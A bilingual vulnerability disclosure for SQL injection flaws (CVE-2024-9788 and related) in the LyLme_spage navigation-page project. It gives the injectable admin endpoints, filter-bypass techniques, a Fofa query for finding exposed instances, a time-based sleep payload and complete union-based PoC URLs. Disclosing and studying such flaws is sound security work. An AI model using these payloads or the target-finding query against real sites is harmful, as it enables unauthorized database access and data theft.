【原创】(CVE-2024-9788)LyLme_spage v1.9.5 SQL注入漏洞
当前为私密分享,无需登录即可查看。
| 时间 |
|---|
| 2024-09-26 12:30:44 |
CVE-2024-9788
CVE-2024-9789
CVE-2024-9790
暂未公开
漏洞描述
- Summary
LyLme_spage 是一个开源的导航页项目,旨在为用户提供便捷的网页导航服务。项目地址:LyLme/lylme_spage: 六零导航页 (github.com)
- LyLme_spage is an open-source navigation page project designed to provide users with convenient web navigation services. Project address: LyLme/lylme_spage: Liuling Navigation Page.
LyLme_spage v1.9.5 版本中存在 多个SQL 注入漏洞。攻击者可以通过构造特定的 SQL 语句,绕过输入过滤,执行未授权的数据库查询操作。由于 group_concat 函数被过滤,攻击者利用 concat_ws 函数进行数据查询。此外,通过修改 LIMIT 参数,攻击者可以遍历数据库中的表名和数据。攻击者还可以通过 sleep 函数实现延时效果,进一步探测数据库结构。
- However, version 1.9.5 of the project contains multiple SQL injection vulnerabilities. Attackers can exploit these vulnerabilities by constructing specific SQL statements to bypass input filtering and execute unauthorized database queries. In version 1.9.5 of LyLme_spage, multiple SQL injection vulnerabilities exist. Attackers can construct specific SQL statements to bypass input filtering and perform unauthorized database queries.
- Since the group_concat function is filtered, attackers use the concat_ws function for data queries. Additionally, by modifying the LIMIT parameter, attackers can iterate through table names and data in the database. Attackers can also use the sleep function to achieve a delay effect, further probing the database structure.
SQL 注入点 1 位于 /admin/tag.php,通过修改 id 参数构造注入语句。
SQL 注入点 2 位于 /admin/apply.php,同样通过修改 id 参数构造注入语句。
SQL 注入点 3 位于 /admin/sou.php,通过修改 id 参数构造注入语句。
- SQL injection point 1 is located at /admin/tag.php, where an injection statement can be constructed by modifying the id parameter.
- SQL injection point 2 is located at /admin/apply.php, where an injection statement can also be constructed by modifying the id parameter.
- SQL injection point 3 is located at /admin/sou.php, where an injection statement can be constructed by modifying the id parameter.
资产测绘
- Fofa query keyword
"LyLme_spage" && icon_hash="-282504889"
审计过程
- Discovery process
如图,虽然做了许多对于SQL注入的过滤,但是任然可以绕过。
- As shown in the figure, although many filters for SQL injection have been implemented, they can still be bypassed.
正常被过滤页面
- Normally Filtered Page
Payload:
-7'+unioN+select%23xxxx%0a1,database(),user(),4,(select%23xxxx%0aCONCAT_WS(',',TABLE_NAME)+test+from+information_schema.tables+where+table_schema='liuzero'+LIMIT+2,1)--+
通过替换limit中 2 遍历表名,遍历数据同原理,主要group_concat被过滤,但是concat_ws可绕过select通过%23xxxx%0a绕过
- By replacing the 2 in LIMIT, table names can be iterated through. The principle for iterating through data is the same. The main point is that group_concat is filtered, but concat_ws can be bypassed. Select can be bypassed through %23xxxx%0a.
当然也可以达到延时效果
- Of course, a delay effect can also be achieved.
Payload:
7'+and+sleep(5)--+
POC
SQL注入点1:/admin/tag.php
- SQL Injection Point 1 POC
/admin/tag.php?set=edit&id=-7'+unioN+select%23xxxx%0a1,database(),user(),4,(select%23xxxx%0aCONCAT_WS(',',TABLE_NAME)+test+from+information_schema.tables+where+table_schema='liuzero'+LIMIT+2,1)--
SQL注入点2:/admin/apply.php
- SQL Injection Point 2 POC
/admin/apply.php?set=edit&id=-1'+unioN+select%23xxxx%0a1,database(),(select%23xxxx%0aCONCAT_WS(',',TABLE_NAME)+test+from+information_schema.tables+where+table_schema='liuzero'+LIMIT+1,1),4,5,6,7,8--+
SQL注入点3 :/admin/sou.php
- SQL Injection Point 3 POC
/admin/sou.php?set=edit&id=-1'+unioN+select%23xxxx%0a1,database(),(select%23xxxx%0aCONCAT_WS(',',TABLE_NAME)+test+from+information_schema.tables+where+table_schema='liuzero'+LIMIT+1,1),4,5,6,7,8,9,10--+
